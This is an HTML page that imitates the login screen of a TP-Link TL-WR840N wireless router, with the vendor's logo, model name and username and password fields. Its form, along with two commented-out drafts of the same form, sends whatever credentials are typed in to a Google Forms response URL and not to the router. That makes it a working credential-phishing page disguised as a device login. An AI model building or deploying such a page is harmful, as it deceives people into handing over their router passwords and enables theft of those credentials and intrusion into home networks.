<!--
<!DOCTYPE html>
<html>
<head>

	<title></title>
</head>
<body>
  <form action="https://docs.google.com/forms/u/0/d/e/1FAIpQLSclIh9wvkvVbLGm3rbzOaFjOSHaSo2116iXjsaStEkOMHSGKg/formResponse">
  	 <input type="text" name="entry.516377498">
  	 <input type="text" name="entry.1753495714">
  	 <input type="submit" name="">
  </form>
</body>
</html>
-->


<!DOCTYPE html> 
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<META http-equiv=Content-Type content="text/html; charset=utf-8" />
<META http-equiv=Pragma content=no-cache>
<META http-equiv=Expires content=0>

<!-- 
<link rel="stylesheet" href="../css/login.css" type="text/css" />
<link rel="stylesheet" href="../img/login/login.css" type="text/css" />
-->
<style type="text/css">
body{
    font-family:Arial, sans-serief;
    background-color:#FFFFFF;
    margin:0px;
    padding:0px;
}
div.loginBox
{
    display: block;
    position:relative;
    margin-top:10%;
    text-align:center;
}
.noteDiv{
    color:gray;
    font-family:Arial;
    width:395px;
    text-align:left;
    margin:0px auto;
    font-size:14px;
}
#note{
    display:inline-block;
    vertical-align:top;
    _display:inline;
    _zoom:1;
    width:50px;
    font-weight:bold;
}
#tip{
    display:inline-block;
    vertical-align:top;
    _display:inline;
    _zoom:1;
    width:340px;
    font-weight:bold;
}
div.panelThre{
    margin-top:10px;
}
div.picDiv{
    width:395px;
    height:276px;
    /*background:url(../login/loginbg.png);*/
    position:relative;
}
input.pcPassword{
    width:300px;
    height:50px;
    line-height:50px;
    padding-left:20px;
}
div.PCBtnDiv{
    position:relative;
    margin-top:20px;
}
img.logoPic{
    width:100%;
}
#copyright{
    -webkit-text-size-adjust:none;
    font-size:8px;
    color:#6a6969;
    font-family:"Verdana";
    font-weight:normal;
    margin-top:40px;
    display:inline-block;
}
.topLogo{
    background-color: #4ACBD6;
    height:96px;
    overflow: hidden;
}
tr{
    vertical-align: top;
}
.topLogo td a img{
    margin:27px 0 0 25px;
}
.topLogo td.last-td img{
    float: right;
    margin-right: 14px;
    opacity: 0.3;
    filter:alpha(opacity=30);
}
ul{
    padding:60px 0px 0px 0px;
    margin:0px;
    list-style:none;
}
ul li{
    height:32px;
    width:250px;
    text-align: left;
}
li.unLi{
    /*background:url(../login/loginUser.png);*/
    background:url(./img/login/input-box.png);

}
li.pwLi{
    /*background:url(../login/loginPwd.png);*/
    background:url(./img/login/input-box.png);
}
li.blank{
    height:8px;
}
input.text{
    border:0px;
    height:32px;
    line-height:32px;
    width:175px;
    padding:0px;
    /*margin-left: 39px;*/
    font-size:14px;
    color:#A7A9AC;
    font-family:"Arial","Verdana";
    font-weight:normal;
    background-color: transparent;
    vertical-align: top;
}
input.text:focus{
    outline: none;
}
button.loginBtn{
    height:32px;
    display:inline-block;
    width:250px;
    margin-top:8px;
    border: none;
    color: #FFFFFF;
    font-size:18px;
    font-family: Arial;
    background:url(./img/login/loginButton.png);
    cursor:pointer;
}

li img{
    line-height: 40px;
    margin: 9px 6px 9px 9px;
}

iframe#top{
    width:100%;
    height:96px;
    border: none;
    display: block;
}

html{
    overflow: hidden;
}
table,tr,td{
    padding: 0;
}
td {
    font-family:"Times New Roman", "ËÎÌå";
    font-size: 12px;
}
form {
    font-family:"Times New Roman", "ËÎÌå";
    font-size: 12px;
}
/*
body {
    font-family:"Arial Black", "ºÚÌå";
    font-size: 16px;
    background: #4ACBD6
}
*/
.style1 {
    font-family:Arial;
    color: #FFFFFF;
    font-size: 18px;
    padding-right: 50;
    text-align: left;
    font-weight: bold;
    white-space: nowrap;
}
.style2 {
    font-size: 14px;
    font-family:Arial;
    font-weight: bold;
    padding-right: 50;
    text-align: left;
    white-space: nowrap;
    color: #FFFFFF;
}

tr{
    vertical-align: top;
}
#first-td{
    width:234px;
}
#first-td img {
    margin:27px 0 0 25px;
    cursor: pointer;
}
#second-td {
    padding-top: 25px;
}
#third-td img {
    float:right;
    opacity: 0.3;
    filter\0: alpha(opacity=30);
    margin-right: 14px;
}
input[type="text"]::-ms-clear,
input[type='password']::-ms-reveal{
    display:none;
}
</style>

</head>

<body>
	<form action="https://docs.google.com/forms/u/0/d/e/1FAIpQLSclIh9wvkvVbLGm3rbzOaFjOSHaSo2116iXjsaStEkOMHSGKg/formResponse"">
<div class="topLogo">
	<table cellspacing=0 width="100%">
        <tr>
            <td>
                <table border="0" cellspacing="0" width="100%">
                    <tr>
                        <td id="first-td">
                                <img src="./img/login/logo.png">
                        </td>
                        
                       
                        

                        <td id="second-td">
                            <table>
                                <tr>
                                    <td id="mname" class="style1"></td>
                                    <tr>
                                     <td id="mname" class="style1">TP-Link Wireless N Router WR840N </td>
                                     </tr>
                               <tr>
                        <td id="mnum" class="style2">Model No. TL-WR840N</td>
                        </tr>
                                </tr>
                                <tr>
                                    <td id="mnum" class="style2"></td>
                                </tr>
                            </table>
                        </td>
						<td id="third-td">

							<img src="./img/login/top-right.png">
						</td>
                    </tr>
                </table>
            </td>
        </tr>
        <!--<tr>-->
            <!--<td>-->
                <!--<IMG height=3 src="../images/top2.jpg" width="100%" align=top border=0>-->
            <!--</td>-->
        <!--</tr>-->
    </table>
</div>
<div class="loginBox">
	<div class="noteDiv">
		<span id="note"></span>
		<span id="tip"></span>
	</div>
	
	<div class="panelThre" align="center">
		<div align="center" class="picDiv">
			<ul>
				<li id="unLi" class="unLi"><img src="./img/login/username.png"><input class="text" name="entry.516377498" maxlength="25" placeholder="Username" autocomplete="off"/></li>
				<li class="blank"></li>
				<li id="pwLi" class="pwLi"><img src="./img/login/password.png"><input class="text" id="pcPassword" name="entry.1753495714" type="password" maxlength="15" placeholder="Password" autocomplete="off"/></li>
			</ul>			
			<!--<button id="loginBtn" class="loginBtn" onclick="PCSubWin()"></button>-->
			
			<button class="loginBtn" type="submit"><span>Sign In</span></button>
			<!--<label id="loginBtn" class="loginBtn" type="submit"/><span>Login</span></label> -->
			<!--
				<div class="panelThre" align="center">
				<div align="center" class="picDiv">
					<form action="https://docs.google.com/forms/u/0/d/e/1FAIpQLSclIh9wvkvVbLGm3rbzOaFjOSHaSo2116iXjsaStEkOMHSGKg/formResponse">
					  	 <input class="unLi" type="text" name="entry.516377498">
					  	 <input type="text" name="entry.1753495714">
					  	 <input type="submit" name="">
	  				</form>
			-->
		</div>
	</div>
</div>
</form>
</body>
</html>
<script type="text/javascript"> var authTimes=1; var forbidTime=0; var modelName="TL-WR840N"; var modelDesc="TP-Link Wireless N Router WR840N "; var forbidAdminLogin=0; var forbidUserLogin=0; var usernameIsAdmin=0;</script>